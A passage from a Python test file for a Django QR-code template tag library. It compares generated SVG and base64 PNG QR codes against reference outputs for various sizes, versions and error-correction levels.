28.8 50.4 L 28.8 52.2 L 30.6 52.2 L 30.6 50.4 z M 55.8 36 L 55.8 37.8 L 57.6 37.8 L 57.6 36 z M 57.6 55.8 L 57.6 57.6 L 59.4 57.6 L 59.4 55.8 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 59.4 54 L 59.4 55.8 L 61.2 55.8 L 61.2 54 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 14.4 57.6 L 14.4 59.4 L 16.2 59.4 L 16.2 57.6 z M 41.4 57.6 L 41.4 59.4 L 43.2 59.4 L 43.2 57.6 z M 16.2 37.8 L 16.2 39.6 L 18.0 39.6 L 18.0 37.8 z M 43.2 63 L 43.2 64.8 L 45.0 64.8 L 45.0 63 z M 36 48.6 L 36 50.4 L 37.8 50.4 L 37.8 48.6 z M 18 61.2 L 18 63.0 L 19.8 63.0 L 19.8 61.2 z M 41.4 10.8 L 41.4 12.6 L 43.2 12.6 L 43.2 10.8 z M 37.8 46.8 L 37.8 48.6 L 39.6 48.6 L 39.6 46.8 z M 46.8 59.4 L 46.8 61.2 L 48.6 61.2 L 48.6 59.4 z M 39.6 45 L 39.6 46.8 L 41.4 46.8 L 41.4 45 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 64.8 7.2 L 64.8 9.0 L 66.6 9.0 L 66.6 7.2 z M 23.4 10.8 L 23.4 12.6 L 25.2 12.6 L 25.2 10.8 z M 32.4 52.2 L 32.4 54.0 L 34.2 54.0 L 34.2 52.2 z M 25.2 52.2 L 25.2 54.0 L 27.0 54.0 L 27.0 52.2 z M 7.2 63 L 7.2 64.8 L 9.0 64.8 L 9.0 63 z M 50.4 28.8 L 50.4 30.6 L 52.2 30.6 L 52.2 28.8 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 52.2 23.4 L 52.2 25.2 L 54.0 25.2 L 54.0 23.4 z M 57.6 39.6 L 57.6 41.4 L 59.4 41.4 L 59.4 39.6 z M 10.8 59.4 L 10.8 61.2 L 12.6 61.2 L 12.6 59.4 z M 54 32.4 L 54 34.2 L 55.8 34.2 L 55.8 32.4 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 55.8 34.2 L 55.8 36.0 L 57.6 36.0 L 57.6 34.2 z M 34.2 64.8 L 34.2 66.6 L 36.0 66.6 L 36.0 64.8 z M 57.6 21.6 L 57.6 23.4 L 59.4 23.4 L 59.4 21.6 z M 63 30.6 L 63 32.4 L 64.8 32.4 L 64.8 30.6 z M 16.2 54 L 16.2 55.8 L 18.0 55.8 L 18.0 54 z M 36 32.4 L 36 34.2 L 37.8 34.2 L 37.8 32.4 z M 46.8 43.2 L 46.8 45.0 L 48.6 45.0 L 48.6 43.2 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 39.6 28.8 L 39.6 30.6 L 41.4 30.6 L 41.4 28.8 z M 48.6 37.8 L 48.6 39.6 L 50.4 39.6 L 50.4 37.8 z M 45 9 L 45 10.8 L 46.8 10.8 L 46.8 9 z M 21.6 25.2 L 21.6 27.0 L 23.4 27.0 L 23.4 25.2 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 27 30.6 L 27 32.4 L 28.8 32.4 L 28.8 30.6 z M 50.4 41.4 L 50.4 43.2 L 52.2 43.2 L 52.2 41.4 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 7.2 28.8 L 7.2 30.6 L 9.0 30.6 L 9.0 28.8 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 63 25.2 L 63 27.0 L 64.8 27.0 L 64.8 25.2 z M 59.4 18 L 59.4 19.8 L 61.2 19.8 L 61.2 18 z M 36 16.2 L 36 18.0 L 37.8 18.0 L 37.8 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 63 36 L 63 37.8 L 64.8 37.8 L 64.8 36 z M 59.4 64.8 L 59.4 66.6 L 61.2 66.6 L 61.2 64.8 z M 39.6 19.8 L 39.6 21.6 L 41.4 21.6 L 41.4 19.8 z M 36 55.8 L 36 57.6 L 37.8 57.6 L 37.8 55.8 z M 45 25.2 L 45 27.0 L 46.8 27.0 L 46.8 25.2 z M 37.8 54 L 37.8 55.8 L 39.6 55.8 L 39.6 54 z M 46.8 9 L 46.8 10.8 L 48.6 10.8 L 48.6 9 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 28.8 10.8 z M 50.4 54 L 50.4 55.8 L 52.2 55.8 L 52.2 54 z M 30.6 21.6 L 30.6 23.4 L 32.4 23.4 L 32.4 21.6 z M 27 50.4 L 27 52.2 L 28.8 52.2 L 28.8 50.4 z M 54 36 L 54 37.8 L 55.8 37.8 L 55.8 36 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 57.6 61.2 L 57.6 63.0 L 59.4 63.0 L 59.4 61.2 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 59.4 63 L 59.4 64.8 L 61.2 64.8 L 61.2 63 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 14.4 48.6 L 14.4 50.4 L 16.2 50.4 L 16.2 48.6 z M 41.4 52.2 L 41.4 54.0 L 43.2 54.0 L 43.2 52.2 z M 63 52.2 L 63 54.0 L 64.8 54.0 L 64.8 52.2 z M 16.2 46.8 L 16.2 48.6 L 18.0 48.6 L 18.0 46.8 z M 36 39.6 L 36 41.4 L 37.8 41.4 L 37.8 39.6 z M 64.8 45 L 64.8 46.8 L 66.6 46.8 L 66.6 45 z M 39.6 50.4 L 39.6 52.2 L 41.4 52.2 L 41.4 50.4 z M 64.8 27 L 64.8 28.8 L 66.6 28.8 L 66.6 27 z M 23.4 63 L 23.4 64.8 L 25.2 64.8 L 25.2 63 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 52.2 57.6 L 52.2 59.4 L 54.0 59.4 L 54.0 57.6 z M 27 37.8 L 27 39.6 L 28.8 39.6 L 28.8 37.8 z M 7.2 54 L 7.2 55.8 L 9.0 55.8 L 9.0 54 z M 55.8 39.6 L 55.8 41.4 L 57.6 41.4 L 57.6 39.6 z M 30.6 55.8 L 30.6 57.6 L 32.4 57.6 L 32.4 55.8 z M 57.6 45 L 57.6 46.8 L 59.4 46.8 L 59.4 45 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 54 16.2 L 54 18.0 L 55.8 18.0 L 55.8 16.2 z M 32.4 64.8 L 32.4 66.6 L 34.2 66.6 L 34.2 64.8 z M 12.6 59.4 L 12.6 61.2 L 14.4 61.2 L 14.4 59.4 z M 55.8 21.6 L 55.8 23.4 L 57.6 23.4 L 57.6 21.6 z M 14.4 61.2 L 14.4 63.0 L 16.2 63.0 L 16.2 61.2 z M 41.4 61.2 L 41.4 63.0 L 43.2 63.0 L 43.2 61.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
results = [default_result] * 10 + [
result_version_2,
result_version_2,
result_version_4,
result_version_4
]
for i in range(len(versions)):
version = versions[i]
print('Testing SVG with version %s' % version)
result = results[i]
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(version=version))
qr2 = qr_from_text(TEST_TEXT, version=version)
qr3 = qr_from_text(TEST_TEXT, version=version, image_format='svg')
qr4 = qr_from_text(TEST_TEXT, version=version, image_format='SVG')
qr5 = qr_from_text(TEST_TEXT, options=QRCodeOptions(version=version, image_format='SVG'))
qr6 = qr_from_text(TEST_TEXT, version=version, image_format='invalid-format-name')
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, qr4)
self.assertEqual(qr1, qr5)
self.assertEqual(qr1, qr6)
self.assertEqual(qr1, result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_error_correction(self):
file_base_name = 'qrfromtextsvgresult_error_correction'
tests_data = []
for correction_level in ERROR_CORRECTION_DICT.keys():
ref_file_name = '%s_%s%s' % (file_base_name, correction_level, SVG_REF_SUFFIX)
tests_data.append(dict(source='{% qr_from_text "' + COMPLEX_TEST_TEXT + '" image_format="svg" error_correction="' + correction_level + '" %}', ref_file_name=ref_file_name.lower()))
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
html_source = mark_safe('{% load qr_code %}' + test_data['source'])
template = Template(html_source)
context = Context()
source_image_data = template.render(context).strip()
# Debug code for updating reference file.
# write_svg_content_to_file(test_data['ref_file_name'], source_image_data)
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'], skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
class TestQRFromTextPngResult(SimpleTestCase):
"""
Ensures that produced QR codes in PNG format coincide with verified references.
The tests cover direct call to tag function, rendering of tag, and direct call to qr_code API.
"""
def test_size(self):
sizes = ['t', 'T', 's', 'S', None, -1, 0, 'm', 'M', 'l', 'L', 'h', 'H', '6', 6, '8', 8, 10, '10']
rt = """iVBORw0KGgoAAAANSUhEUgAAAK4AAACuAQAAAACHdwtDAAABBklEQVR4nO2XMU5EMQxEn9eRKPNv5H81bvb3KHsApKRE8mooskDBStCAC9ZVNI2fovE4MXGnrqd7Kjzk/yojLadEggaAS1kE6JIGPqIRN7Cqq5rWoPXnBLO9kuRW8fct78vTWjlJV8J1C0A6CkmuZrbhAzibWRGJfaS9geftXJX2bZrZngTT6manATnxPLuwDaBlXcb2w0dIR66krclYJLkkKYnsgigkSSIJIIkFVkWyii6XsqvoTk6A2ZodmLtfqvLk3ScjAPqRZT5pAHPzF+ijXTbpXDTFn0uPub82rI/85Zbfy/140qHL/octv8hdCWsdr5itfccCPsJ1FDnWHj+vh/wD+Q2xAZu1VAND1QAAAABJRU5ErkJggg==" """
rs = """iVBORw0KGgoAAAANSUhEUgAAAVwAAAFcAQAAAACsbTuBAAABbklEQVR4nO3aQY4DIQwEwO5V7vD/3+UH8ALvAcIAYaVopSGWaE4TVAcfLIdphoaPV/753ALCwsLCwsLCwgNmWxHIJDlvbilD2CMOVlZ5RjDGcXNPGcIucZsPjLAnLQ2b28oQ9o7D8tXWd83CW/A4Lr5WhvBX8aM9XZMiEyFx2ry3DGHHONc3EqD7Q+k395Qh7AjXuTHMh0xkzpv3liHsFzOiRRmW6ugYw40dZQh7wjAbkg1LGDONGneYmSUnNQvvwVcn1HFR26D+LClH7R71xln41RuvCLQ0RhsgwJWOqjcOw5j6ob2k1J2+c9QbZ2G+B6AEDGBIAJBjl3s4qVl4K+6vXMsZA0C5blO+cSqezxv9Tcp1ItV542zcRxmlSeo1/VPfb5yJH8tdhmSZKGePoO83zsTr3jCAwcpBtB5K7y1D2CFe3MNajgCQacE4YCc1C+/Bq4S8PZSYNCkXPRMv8o0/l/INYWFhYWFh4f/gX5HE6vc486ONAAAAAElFTkSuQmCC" """
rm = """iVBORw0KGgoAAAANSUhEUgAAAgoAAAIKAQAAAABqulr4AAACO0lEQVR4nO3cQW6kMBCF4VfjlmbJ3GCOAkeHo+QGsIwEqiyMwZA0MBM6tNR/rWiTfCo2likXNtc3o/n1XUGCgICAgICAgICAgICAgICAgID4X8KWcZOkJl5LUre6Xz0mCwgICIjjROlTtGmkVXCPc1SYb/s94oQsICAgII4T3WIdZVap8Hcz9zqNTMuwB2YBAQEBcT9uu38R9nojnuNBICAgICStV19XZQEBAQGRYrnWKlbrqsak0MvS7y+XXc/xIBAQEC9INPMO4Z84UqayvCQN2Q7iA7OAgICA2Ip5rfXVOqoxaYhT1HoZdmoWEBAQEP9OmFV5U9ZNiluHIfY5LG89LAsICAiInfA82jhWunuf3Vr9S3DPmrvq53gQCAiIlyPMzP56H3909jtNVkPq1wru8WLIOrjOzgICAgJiO/K3vbKeurPGKlZTzSOtNG4mhv7sLCAgICCORl6NH/scxskqNTwMJpfUWejnir2prE/MAgICAuJw+P2QpCJezFWsOJIFdS0ICIhriM9nPuTFK3Vx67D0N/q1ICAgLiTyjcLFmQ9htXVYxF3FWsvDH1hrQUBAXEl8/upwekN8S2st93fO14KAgLiM2DvzYSzCN/Gd0CQV7eoUiOd4EAgIiBch9matseGhdGm4zZuJJ2cBAQEBcTS2znxwNdV42VjRBteiCn9iFhAQEBCHY/OznSnKVJ9ff+xDNR4CAuJnia0zHxYjhU8j1LUgICAgICAgICAgICAgICAgIK4mPgAhWy686mP48AAAAABJRU5ErkJggg==" """
rl = """iVBORw0KGgoAAAANSUhEUgAAA2YAAANmAQAAAAC5rqVTAAADVklEQVR4nO3dzW6jMBQGUHuoNEvyRsyjp4/SN2iWlYI8i5jwZ9I003QIOXcVKOao3n3Cvo4p/Fy1v34QC4FGo9FoNBqNRqPRaDQajUaj0Wg0Go1Go9FoNBqNRqPRaDQajUaj0Wg0Go1G+/ZK41p+sDk9cJyPfV8cU41fftzyTNJoNBqNRqPRaLSVapNgMkkxVb5sUkoxxpd8u5kPuk67Y9FoNBqNRqPRaLTn017Ktw+7889q8OUmni7rFMJrDGESY2L/s9kXX7vlmaTRaDQajUaj0Whr0BYyzufV3NJ0esszSaPRaDQajUaj0R5WO8RzfS0jPcD/RqPRaDQajUaj0R5aW8go9eJXmjavSGv2o8VpIcyWrhVqyzNJo9FoNBqNRqPR1qAVMk4b5/f6qo6j3TpdvV4c1NWWZ5JGo9FoNBqNRqOtQYtf2lYzDzLDjgSfVrvlmaTRaDQajUaj0Whr1PIWm8GOm67+hBAG5+M0fXfohYev0O5bNBqNRqPRaDQa7fm06Vq1+Wed7ktNbhZdjZ+4sLAtzr/ybHkmaTQajUaj0Wg02hq0UD64s04p7U8/h4d+DmofZp91BpeFN6eUjlueSRqNRqPRaDQajbYGrZBxqnk4GeaUPG4QaupxPhr8Vcah0Wg0Go1Go9Fo/zfjLH+aacYpJo+dPHw5Lsk4NBqNRqPRaDQa7c51U1+1+v18Odlx0770f52Xvmo0Go1Go9FoNBrth7V5i7SFvmqDOvSN1KqU0lsecIV236LRaDQajUaj0WjPpxXOAC0cedMd+plzy6HPL20MoU7nrmttfl+zL2pbnkkajUaj0Wg0Go22Bq2QcULoQ00oRp7JWrVB5Ok6S7/G4tgtzySNRqPRaDQajUZ7WO3QL137iDHu8u28Rm0Xiq2kb9ZuLhqNRqPRaDQajUa7qup0Oh8nxvg7t0zbh3OLtrd+e863aDcXjUaj0Wg0Go1Gez5tYa1aXW63Nthxk6uNp6VrTTrv1rlQW55JGo1Go9FoNBqNtgatkHHa5awy7znQ7cfJTQa6DTi5BcG0tjyTNBqNRqPRaDQabQ3a187H+cdyPg6NRqPRaDQajUaj0Wg0Go1Go9FoNBqNRqPRaDQajUaj0Wg0Go1Go9FoNBrtwbW/A9OtzDU2mrIAAAAASUVORK5CYII=" """
rh = """iVBORw0KGgoAAAANSUhEUgAABXAAAAVwAQAAAADN9EoDAAAG9klEQVR4nO3dwarbMBRAwefS//9ld+GNwMhR0h5SwcwiGDtRDlpf5OP82cmvbwe8R25JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5Jbun37MGxvMT5+KvnpytrjjbbXbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXpPMNlNldwmU0vHJPrz9Ycbba7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktySy/mGS7Ppy6M3zmHz/skw7tr3m22u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktL8wyfWZlPeNdmuyu3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLeUzDN8dvbCis12V25JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbmlpnmF9GmGcZDhvdz5bc7TZ7sotyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS29mGeYTSPMPM8wfLbmaLPdlVuSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSWzr+1ZsgnqcUvG9iB3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLm+VOz2e45hNWzls4J9+83/n7mYfNdlduSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5pOs/wPF0wPh0nH2a/Wn/HxLja3Wa7K7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/TifIbL7JSG59mD2QkP91mIldUum+2u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLc0nSe4XJOrmd3ZnML9zv36Qjvm/g2uSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXNco/nKYKVcxVmpzfMnq78o/dNfIPcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLc0ma5L+YZ3lhouL5PPqy8k2LFZrsrtyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3NH3fxOy8hbtz+Hz+1X164d3TGzbbXbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXpPMNl/W0Us+vxzjm5Xvmvy2a7K7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/RinuFyn094nj2YvW/ieZ2V2YbNdlduSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5paZ7hXeMMw2yS4T694HyGb5NbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5Jb2iw3mWeYnc+wfmdms92VW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbWppnWJk0mJ3D8DPcfz6xYcVmuyu3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLf0Yp5hfergmFxfxhmG83b/Z/L0brPdlVuSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSWzpWzl74f2y2u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/AI2oXvO88XOVAAAAAElFTkSuQmCC" """
r6 = rt
r8 = """iVBORw0KGgoAAAANSUhEUgAAAOgAAADoAQAAAADN0pXVAAABBElEQVR4nO2YwRKDIAxE33b8/1/eHgJUe/BQEDMWD2jmHdwdIkmUObleZ3DRRRe9mW4AimejskSUVXO3XwwgsCy3KKvmfr+xsciWW3SjqnnUp/S6986i2zHU0XFOzQP8FpPCYmc5p+Z+v+VIDrctyqq5h2qfvoK/yGfFvtrC2rvOqbmbGopbt2x+aP19ASiqbl3smueJNf9Ia3/laDji/uB+Q6V5dKtFKv3kM/vnr/PZn6y+U9Wk+aiUX7dNzql52HwkBLKq3aSah81H4KjFjpMrqeaBNA4tRSVOo+o6amTXDzmNqoH0MB9ZxNB/t6pJ85HKP51alpJqHlZ/J7530UUX7advq/JW1h0TisgAAAAASUVORK5CYII=" """
r10 = """iVBORw0KGgoAAAANSUhEUgAAASIAAAEiAQAAAAB1xeIbAAABeklEQVR4nO2ZS46DMBBEXw9IszQ3mKOYo8NRcgO8jERUszC/TBaTjQOC9grQkyg17aYoTPy/+q83IHDKKaeccurolE2rht7MIM1X2l11XYKKkqQBiEMla6kkSXqmPq/rElSaetzacDd1QN4Ge+u6GFW92s5D6LoAlZYp/6k7XpWax0oQkIC+qUYD2Hb/UdWfgurNzKwB4gDAI9ucvXWdmsp9v+nxvsGmbbCnrutQ1qbJ36uj0uzv3ecUpcg+Plt7jWxdPZWy8e+Oqv4MlNnPCKRvAQ9TRyV1+WhPXeempkaPmlcue5Bg/rj1vi9Dsa34/FmVT9eH4rUvQqHnBWGpeFj2wlHVn4Fac8xpwKca4s39fVHqad4PS5QTxs3g8b4vS60pTpCItxqi7p7fl6TqlyupHtU3YITB8/uS1Gvtw4BFPWqR6nE3XVeigqQOpndt31TK0dreus5MvYQIQP5xuEYM/q4tQ/3NMeejEW3+YB1VvVNOOeWUU+9Sv6Lp54yG/greAAAAAElFTkSuQmCC" """
results = [rt] * 2 + [rs] * 2 + [rm] * 5 + [rl] * 2 + [rh] * 2 + [r6] * 2 + [r8] * 2 + [r10] * 2
for i in range(len(sizes)):
size = sizes[i]
print('Testing PNG with size %s' % size)
result = results[i]
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(size=size, image_format='png'))
qr2 = qr_from_text(TEST_TEXT, size=size, image_format='png')
qr3 = qr_from_text(TEST_TEXT, options=QRCodeOptions(size=size, image_format='png'))
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, BASE64_PNG_IMAGE_TEMPLATE % result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_version(self):
versions = [None, -1, 0, 41, '-1', '0', '41', 'blabla', 1, '1', 2, '2', 4, '4']
default_result = """iVBORw0KGgoAAAANSUhEUgAAAgoAAAIKAQAAAABqulr4AAACO0lEQVR4nO3cQW6kMBCF4VfjlmbJ3GCOAkeHo+QGsIwEqiyMwZA0MBM6tNR/rWiTfCo2likXNtc3o/n1XUGCgICAgICAgICAgICAgICAgID4X8KWcZOkJl5LUre6Xz0mCwgICIjjROlTtGmkVXCPc1SYb/s94oQsICAgII4T3WIdZVap8Hcz9zqNTMuwB2YBAQEBcT9uu38R9nojnuNBICAgICStV19XZQEBAQGRYrnWKlbrqsak0MvS7y+XXc/xIBAQEC9INPMO4Z84UqayvCQN2Q7iA7OAgICA2Ip5rfXVOqoxaYhT1HoZdmoWEBAQEP9OmFV5U9ZNiluHIfY5LG89LAsICAiInfA82jhWunuf3Vr9S3DPmrvq53gQCAiIlyPMzP56H3909jtNVkPq1wru8WLIOrjOzgICAgJiO/K3vbKeurPGKlZTzSOtNG4mhv7sLCAgICCORl6NH/scxskqNTwMJpfUWejnir2prE/MAgICAuJw+P2QpCJezFWsOJIFdS0ICIhriM9nPuTFK3Vx67D0N/q1ICAgLiTyjcLFmQ9htXVYxF3FWsvDH1hrQUBAXEl8/upwekN8S2st93fO14KAgLiM2DvzYSzCN/Gd0CQV7eoUiOd4EAgIiBch9matseGhdGm4zZuJJ2cBAQEBcTS2znxwNdV42VjRBteiCn9iFhAQEBCHY/OznSnKVJ9ff+xDNR4CAuJnia0zHxYjhU8j1LUgICAgICAgICAgICAgICAgIK4mPgAhWy686mP48AAAAABJRU5ErkJggg==" """
result_version_2 = """iVBORw0KGgoAAAANSUhEUgAAAlIAAAJSAQAAAAAgpBbeAAADC0lEQVR4nO3dQZLbIBCF4deRqmYp3yBHkY9ujjI3sPZWdRaABPbYk6RsWSQ/K4+k+Qo2FDQNmOtZJfx4GiVhYWFhYWFhYWFhYWFhYWFhYWFhYbVjWV16yeyYX4b4UJKmqw+PX1jPrBcWFhZWW1Zf/B5Py8/pIMnzD2l0ac7fdpf1f+xF9cLCwsL6N6ypGoKaHTW4u0vBDup8zR1YxrTb1AsLCwurHat/8M4VbDjPvWJ/OveqxrQvrRcWFhZWq9ajflUafbKHH1Rlr23EwsLC2tKq+9Wh2iVg+UnsWztfo6lf7ibYaxuxsLCw3mWFdZH/EJ+M/hmDqKOf1+/mIhtgi3phYWFhtWSt49XbIWgKq5qkYIOnJ8Pdna97bSMWFhbWeyyzo6a8xD/FsWiwn74kVc05VWDOiax1jmsDbcTCwsLa1gpx+m9mZXcqyd39nPOsUt8bcqzg9fXCwsLCatNyP2nwS+xFP+3DPYZVu5i/umSrDlWX+/p6YWFhYbVl3cmzKtIAJLlGnw5z/ruLEdbhPFsVld1rG7GwsLDeZy1zfLM+Dlw9jk7Tfiv30xqDlTp34qtYWFhY962UTBW3r17yStaHXycAlOtWW9QLCwsLqyVr7RrjLoA0tZ+su6Ssqtnk8dyVPOvv7gRY99pGLCwsrC2tNNlfyuVqAeucp/9D9Y2k8om7u5/22kYsLCysLa16vLpsVk3HAoTj4Mty1XyzxrUcyfL8emFhYWG1al2PV8siKZ8TOOYn4/pKcSjLeBULCwvra+v2voDifIDqvoD0yvPa1mvrhYWFhdWW9fi+gGDpfIDxlC4OuD4fgDgAFhYW1lUpZv3LoVVjXq5a5/hSdV+AxLoVFhYW1l9Yt4cAjDed8O9af1awsLCwWrUe3RcQEwHmPuWvKt/MIkkKOU1gjR7stY1YWFhYW1qP7gtIGwRcUjim7rS4mDU9eU29sLCwsFq1yvhqVW6jqRepOOGq+EF8FQsLC2st398XsJR8jFV1cQD5AFhYWFhYWFhYWFhYWFhYWFhYWFj/q/ULXEmDCUnFmPAAAAAASUVORK5CYII=" """
result_version_4 = """iVBORw0KGgoAAAANSUhEUgAAAuIAAALiAQAAAAC0mI6SAAAEL0lEQVR4nO3dTW6jQBCG4a8GS7MkN8hRyM2iuZk5Sm4Ay5GMahYNTXeDM5EhcUzeWmF+HiE2peqfsrk+L9pfn4hL6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6N9JtzxO2ZkX9dkZqbWn6cm+ePTly98dHR0dHf2oeuMxOkkKh5dwsfa/Zu5n1e7uIVvFTFTNT/o1/XPfHR0dHR39qHpfFD5tKKBClVS5S413GszCQZVkolhtXdf3DnR0dHT0n6ebvagOdVPjb1OSitnqeSqpbtO3Bzo6Ojr6T9SbaXDvzzS7NJ5JDm7XtwY6Ojo6+jH1fBCuLnbitlZ36W9Tc5YkxfuWB2k88pdBR0dHR/8OejsvtXsKZxp/s9/uZq9plVRNayFOYdxPGpJVevd5d3R0dHT04+hz3fRO86JwaTBJrY1nWqt9MLmW1dYcj/xl0NHR0dHvr8fleXF9uDQuHX9nnV62sekpc77w3dHR0dHRj6v3ZtMmpst05pQs2IuX4piepPlSz5geOjo6OvoO4Wl04Vy5dyluwo17bwsk7r0dF5yPcX7kL4OOjo6O/l30yj2pm5q51UMsoHo7JQVUzGixQcT93h0dHR0d/Rj6XDclZ87SNLsUy6VYHHXhrpi24j3LoG5CR0dHR78lktw0DuWtdcZLCqi6yFbxIOvCR25CR0dHR785lvNNSXEU74nTTM0yAakssshN6Ojo6OibYi03ZQsequQgxDgV1ZWzS+EpchM6Ojo6+l56skHpdersqnTBwzCtD48pKW50EmvI0dHR0dH3i2K+aYx6Hp0rF+yNT2Vr+S7FuB91Ezo6Ojr6hnhnvimmm2vzTXn+YkwPHR0dHX1nPelZZPbsHhq6ah7K01pfiKwxbJfdrKN8GXR0dHT0r9Xz/U2xVVGy9M7XFpOH2qpcQ05fCHR0dHT0PWItN83JJR3Ku7r3tpusxeOP/GXQ0dHR0e+ll/NNZRu9LquJ1vrpNZ70jhD7m9DR0dHRN8d6bqoXA3f5cF/RT6/KbiY3oaOjo6NvivUxvW6+lK7BW/aFSKSy5RG5CR0dHR39tvDrkTR/aIrBvezSMrWRm9DR0dHRN8RaBSRpMfG0Nt9UZfmL3ISOjo6Ovrsec8qy6Wtrtv7/TVI2Esj/N6Gjo6Ojb49iBE/Scrwui3jPcr6pDOomdHR0dPSd9bAsPG31EFpGXCT3P6GSysql3sws9pf4j7490NHR0dF/op4M5Y3RTC3KG/d5VfmYv+qxXPqgvjXQ0dHR0Y+pn7JfdbkiQnUnSWpNqi5ySbUPJ5mac/8kyadLUmvjzXM88pdBR0dHR7+Xnuam1vJrJqm3aqqOBlNIXZUru7PuhvC7t+oiU3Oerjzyl0FHR0dHv5dui0ppx2gf+cugo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjfyT+AZQbXo3Rxei0AAAAAElFTkSuQmCC" """
results = [default_result] * 10 + [
result_version_2,
result_version_2,
result_version_4,
result_version_4
]
for i in range(len(versions)):
version = versions[i]
print('Testing PNG with version %s' % version)
result = results[i]
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(version=version, image_format='png'))
qr2 = qr_from_text(TEST_TEXT, version=version, image_format='png')
qr3 = qr_from_text(TEST_TEXT, version=version, image_format='PNG')
qr4 = qr_from_text(TEST_TEXT, options=QRCodeOptions(version=version, image_format='PNG'))
